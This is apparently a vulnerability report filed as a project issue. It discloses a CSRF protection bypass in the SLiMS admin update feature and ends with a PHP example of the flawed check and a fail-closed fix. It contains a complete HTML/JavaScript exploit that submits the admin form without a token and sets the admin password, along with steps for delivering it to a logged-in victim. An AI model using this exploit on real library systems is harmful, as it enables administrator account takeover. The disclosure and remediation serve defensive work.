[SECURITY BUG] Full Account Takeover via CSRF Protection Bypass on the Update Admin Feature #103

Open
@jrsfaisal

Description

Hello,

I found a security bug in the update admin feature. The feature already has CSRF protection, but it can be bypassed.

Through this bug, together with carelessness on the part of an admin-level user, an attacker can fully take over the admin account.

Proof of concept

  1. When updating admin data, a CSRF token is already present.
    (screenshot: 6_bypass csrf 1)

  2. Unfortunately, there is no server-side check for the presence of the csrf_token parameter. The csrf_token parameter can be removed when POSTing the data, so the protection is bypassed. The following is the CSRF exploit script that can be used to exploit this flaw:

```html
<html>
  <body onload="submitRequest()">
  <script>history.pushState('', '', '/')</script>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http:\/\/192.168.100.18:81\/slims\/admin\/modules\/system\/app_user.php?changecurrent=true&action=detail&ajaxload=1", true);
        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,*\/*;q=0.8");
        xhr.setRequestHeader("Accept-Language", "en-US,en;q=0.5");
        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=--------863798609");
        xhr.withCredentials = true;
        var body = "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"form_name\"\r\n" + 
          "\r\n" + 
          "mainForm\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"userName\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"realName\"\r\n" + 
          "\r\n" + 
          "admin\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"userType\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"eMail\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[fb]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[tw]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[li]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[rd]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[pn]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[gp]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[yt]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[bl]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"social[ym]\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"image\"; filename=\"\"\r\n" + 
          "Content-Type: application/octet-stream\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"base64picstring\"\r\n" + 
          "\r\n" + 
          "\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"passwd1\"\r\n" + 
          "\r\n" + 
          "faisal\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"passwd2\"\r\n" + 
          "\r\n" + 
          "faisal\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"saveData\"\r\n" + 
          "\r\n" + 
          "Update\r\n" + 
          "----------863798609\r\n" + 
          "Content-Disposition: form-data; name=\"updateRecordID\"\r\n" + 
          "\r\n" + 
          "1\r\n" + 
          "----------863798609--\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i); 
        xhr.send(new Blob([aBody]));
      }
    </script>
  </body>
</html>
```
  3. Save the exploit script above as an HTML file.

  4. Send exploit.html to a victim who is logged in to their SLiMS instance.
    (screenshot: 6_bypass csrf 2)

  5. The following is the response showing the result of the admin data change.
    (screenshot: 6_bypass csrf 3)

  6. Once this succeeds, the attacker can take over the account by logging in to the victim's SLiMS system using
    username : admin
    password : faisal
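The server-side gap the report describes, and the fix for it, as an added example that is not SLiMS code: the vulnerable pattern only compares the token when the parameter is present, so omitting csrf_token skips the check entirely, while the hardened version fails closed on a missing token. The session key name and the function names are assumptions.

```php
<?php
// Added example (not SLiMS code). Models the server-side csrf_token check for
// the admin update form. The session key name 'csrf_token' is an assumption.

// Bug pattern from the report: the token is compared only when the parameter
// is present, so a POST body without csrf_token passes straight through.
function csrf_check_vulnerable(array $post, array $session): bool
{
    if (isset($post['csrf_token']) && $post['csrf_token'] !== $session['csrf_token']) {
        return false;
    }
    return true;
}

// Fail closed: a missing session token, a missing or non-string POST token,
// or a mismatch all reject the request; hash_equals avoids a timing side channel.
function csrf_check_hardened(array $post, array $session): bool
{
    if (empty($session['csrf_token']) || !is_string($session['csrf_token'])) {
        return false;
    }
    if (!isset($post['csrf_token']) || !is_string($post['csrf_token'])) {
        return false;
    }
    return hash_equals($session['csrf_token'], $post['csrf_token']);
}

// Per-session token from a CSPRNG; store it in the session and embed it in the form.
function csrf_token_issue(): string
{
    return bin2hex(random_bytes(32));
}

// Constructed inputs for a stand-alone run (no real session or HTTP request).
$session = ['csrf_token' => csrf_token_issue()];
// Forged request shaped like the PoC above: the csrf_token field is absent.
$forged = ['form_name' => 'mainForm', 'userName' => 'admin', 'passwd1' => 'new',
           'passwd2' => 'new', 'saveData' => 'Update', 'updateRecordID' => '1'];
// Genuine request: the same fields plus the token the legitimate form carries.
$genuine = $forged + ['csrf_token' => $session['csrf_token']];

printf("vulnerable check accepts forged request: %s\n",
       var_export(csrf_check_vulnerable($forged, $session), true));
printf("hardened check accepts forged request:   %s\n",
       var_export(csrf_check_hardened($forged, $session), true));
printf("hardened check accepts genuine request:  %s\n",
       var_export(csrf_check_hardened($genuine, $session), true));
```

The point is that absence of the parameter must be treated the same as a wrong token; any handler that mutates admin data should run the hardened check before touching the record.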
